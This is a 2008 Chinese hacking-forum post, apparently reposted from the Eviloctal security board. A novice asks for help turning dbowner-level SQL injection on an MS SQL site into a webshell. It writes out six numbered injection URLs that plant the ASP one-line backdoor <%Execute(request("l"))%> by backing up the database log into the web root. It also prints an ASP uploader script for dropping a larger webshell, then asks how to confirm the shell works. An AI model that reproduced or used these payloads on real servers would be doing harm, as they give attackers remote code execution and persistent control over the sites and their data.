返回列表 发帖
valen886

Rank: 6Rank: 6

帖子
310 
积分
810 
威望
1302  
金钱
1010  
在线时间
2 小时 

内部成员灌水王
1 跳转到 » 倒序看帖
打印
tT
发表于 2008-7-21 00:14 | 显示全部帖子

[讨论]SQL注入dbowner权限拿webshell

SQL, dbowner, webshell, 权限, 讨论
[讨论]SQL注入dbowner权限拿webshell
议题作者:free2ndfree
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
原始连接:www.eviloctal.com

SA权限的现在少了,对于菜鸟来说,拿个webshell真不容易呀!了解到dbowner权限可以拿webshell(经常盲注入时经常遇见dbowner权限),我找了好多资料,哎,郁闷的狠就是找不到相关的动画,都是以文字的形式写出来的,在黑防找到一个动画还是给VIP用的。天无决人之路,还是看文章吧!


很快就找到了一个dbowner权限的注入点,用NBSI就够了,我就不多废话了。由于是菜鸟我不知道咋样判断web与数据库是否在同一服务器上(别骂我),但我觉得我找的这个网站是满足网上一些牛人说的条件的。

数据库:xxx
物理路径:d:\xxxxx\
注入点:http://www.xx.com/show_Topic.asp?T_id=436  数字型

1 http://www.xx.com/show_Topic.asp?T_id=436;alter database xxx set RECOVERY FULL
2 http://www.xx.com/show_Topic.asp?T_id=436;create table cmd (a image)--
3 http://www.xx.com/show_Topic.asp?T_id=436;backup log xxx to disk = 'c:\cmd' with init
4 http://www.xx.com/show_Topic.asp?T_id=436;insert into cmd (a) values (&#39;<%Execute(request("l"))%>&#39;)--
5 http://www.xx.com/show_Topic.asp?T_id=436;backup log xxx to disk = &#39;d:\xxxxx\asa.asp&#39;--
6 http://www.xx.com/show_Topic.asp?T_id=436;drop table cmd--

我一个一个提交,估计是有一句话马诞生了,我访问http://www.xx.com/asa.asp,是乱码!
难道是我提交成功了?接下来就不知道该咋办了,废话肯定用客户端连接,有人说。
<%Execute(request("l"))%>我以前没用过这个一句话马,不知道用哪个连接。结果我把上面的一句话马换成了海洋的一句话,可惜就是提交不成功估计是太长了吧。幸运呀,作夜12点了,我到论坛发贴问了一下,一个管理员说用:  一话后门提交.htm  里面的内容:
------------------------------------------------------------------------------------------------------------
                               一句话后门提交

表单提交地址:  http://
----------------------------------------------------------
set iP=server.createObject("Adodb.Stream")
iP.Open
iP.Type=2
iP.CharSet="gb2312"
iP.writetext request("aoyun")
iP.SaveToFile server.mappath("aoyunwan.asp"),2
iP.Close
set iP=nothing
response.redirect "aoyunwan.asp"
-----------------------------------------------------------
添入生成木马的内容
本提交页面所对应的服务端为 <%execute request("aoyunwan")%> ,可自行修改

------------------------------------------------------------------------------------------------------------
看来论坛上的人还是负责滴,把下载地址都贴了出来了。没办法太菜了,我在“添入。。。。。。,可自行修改”那里添了海洋顶端。把地址写上http://www.xx.com/asa.asp,直接提交,其他的没有修改,结果还是乱码!
写这个帖子主要是想搞清楚:
1 我访问一句话马,咋样知道是否写入了?是否成功了?页面情况是个啥?(我上面返回的是乱码)
2 咋样判断数据库与web在同一服务器上(难道是靠经验)?
3 就是那个一句话木马连接客户端,在提交时有啥要修改的?当然了<%Execute(request("l"))%>中的l是密码我还是知道滴。我在海洋顶端里也把#换成了l,不知道其他的用修改哪里。

最后我再占用邪八一点空间(奸笑中。。):难道dbowner拿webshell是秘诀,就是找不到相关的动画,也许高手现在已经不做动画了吧!还是慢慢等吧!也不知道写了半个多小时的帖子啥时候能通过审核。


              





[s:39]  [s:38]
帖子28 精华2 积分104 阅读权限40 性别男 在线时间18 小时 注册时间2006-3-22 最后登录2008-6-8 查看详细资料引用 报告 回复 TOP 您知道您年薪应是多少?

寂寞宝贝
荣誉会员
收藏 分享

返回列表